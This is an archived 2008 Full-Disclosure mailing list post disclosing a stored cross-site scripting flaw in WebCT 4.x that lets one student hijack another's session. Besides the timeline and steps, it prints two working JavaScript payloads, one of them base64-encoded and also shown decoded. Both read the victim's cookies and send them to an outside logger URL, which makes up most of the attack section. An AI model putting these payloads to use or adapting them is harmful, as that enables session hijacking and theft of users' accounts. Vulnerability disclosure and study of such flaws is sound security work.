lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 5 Mar 2008 21:08:48 +0900
From: "Benjamin 'balupton' Lupton" <balupton@...il.com>
To: "Full Disclosure" <full-disclosure@...ts.grok.org.uk>
Subject: WebCT 4.x Javascript Session Stealer Exploits

WebCT 4.x Javascript Session Stealer Exploits

Software: WebCT Campus Edition 4.x (http://secunia.com/product/3280/)
Affected Version: 4.1.5.8
Discoverer: Benjamin "balupton" Lupton
Date Discovered: November 2005
Date Reported: 25/06/2007
Software Author Contacted (again) on: 20/07/2007
Date Published: 05/03/2008

Published At:
http://www.balupton.com/blogs/dev?title=webct_session_stealer_exploit
http://www.balupton.com/documents/webct_exploits.txt

Attack Type:
Javascript Session Stealer Exploit.

Description:
Mail & Discussion Board messages are not properly checked for javascript,
allowing javascript to perform a session stealing attack (allowing the
attacker to be logged in as the victim).

Tested On:
Attacks were tested fully on eCentral TAFE's WebCT System in November 2005
(with permission of staff),
and again on Curtin University's WebCT System in June 2006 (but this time
only to see if the javascript will run).

Action Taken:
Contacted TAFE lecturers and administrators, who didn't really care.
Contacted WestOne multiple times, but never recieved any response.
Then contacted Secunia, which would not publish as the discoverer did not
own their own copy of the software in question.
Published as WebCT is being phased out, with Blackboard being the
replacement.

Steps:
The attacker publishes the exploit code in a message with "Don't wrap text"
enabled.
The victim accesses the attacker's message and their cookies are sent to the
attacker's remote logger.
The attacker then logs into the system and replaces his/her cookies with the
acquired cookies.
- Cookies are formatted as follows within the "value" attribute:
CookieName=CookieValue; NextCookieName=NextCookieValue;
The attacker is now logged into the system as the victim.
In this case the logger is located here:
http://www.balupton.com/sandbox/logger.php?pass_code=secret_key

Notes:
Victims must be students (attack does not work on non students, eg.
teachers/admins).
Attack 2 will also run in Opera, but fails to retrieve the document.cookie
value.
Attack 2 uses a base64 encoded javascript which is executed.
Both attacks can be customized to allow any javascript to run.
Javascript can also be developed to post a mail or discussion board message,
this works for all types of victims.

Resources:
Attack Code: See below
Logger:
http://localhost.balupton.com/sandbox/logger.php?pass_code=secret_key&show_s
ource=true
Base64 Decoder / Encoder: http://www.balupton.com/sandbox/base64.php
Cookie Editor: Firefox - http://editcookies.mozdev.org/ , Opera - Built In

Attack 1 - IE6SP2 Exploit (Automatic):
<div id="mycode" style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="// balupton's javascript
session stealer automatic hack
	var iframe = document.createElement('iframe');
	iframe.style.border = 'none';
	iframe.style.height = '1px';
	iframe.style.width = '1px';
	var url =
		'http'+'://www.balupton.com/sandbox/logger.php'
		+'?variable=document.cookie'
		+'&value='+escape(document.cookie)
		+'&url='+escape(document.location)
		+'&pass_code=secret_key'
		;
	iframe.src = url;
	document.body.appendChild(iframe);">Thank you</div>


Attack 2 - Firefox Exploit (Manual):
<a
href="data:text/html;base64,PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KLy8g
YmFsdXB0b24ncyBqYXZhc2NyaXB0IHNlc3Npb24gc3RlYWxlciBtYW51YWwgaGFjaw0KdmFyIHVy
bCA9DQoJJ2h0dHA6Ly93d3cuYmFsdXB0b24uY29tL3NhbmRib3gvbG9nZ2VyLnBocCcNCgkrJz92
YXJpYWJsZT1kb2N1bWVudC5jb29raWUnDQoJKycmdmFsdWU9Jytlc2NhcGUoZG9jdW1lbnQuY29v
a2llKQ0KCSsnJnVybD0nK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlciA/IGRvY3VtZW50LnJlZmVy
cmVyIDogJ2h0dHA6Ly9leHBsb2l0ZWRfdXJsLmNvbScpDQoJKycmcGFzc19jb2RlPXNlY3JldF9r
ZXknDQoJOw0KZG9jdW1lbnQubG9jYXRpb24gPSB1cmw7DQo8L3NjcmlwdD4=">Click Me!</a>

Attack 2 - Firefox Exploit (Manual) - Decoded:
<script type="text/javascript">
// balupton's javascript session stealer manual hack
var url =
	'http://www.balupton.com/sandbox/logger.php'
	+'?variable=document.cookie'
	+'&value='+escape(document.cookie)
	+'&url='+escape(document.referrer ? document.referrer :
'http://exploited_url.com')
	+'&pass_code=secret_key'
	;
document.location = url;
</script>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ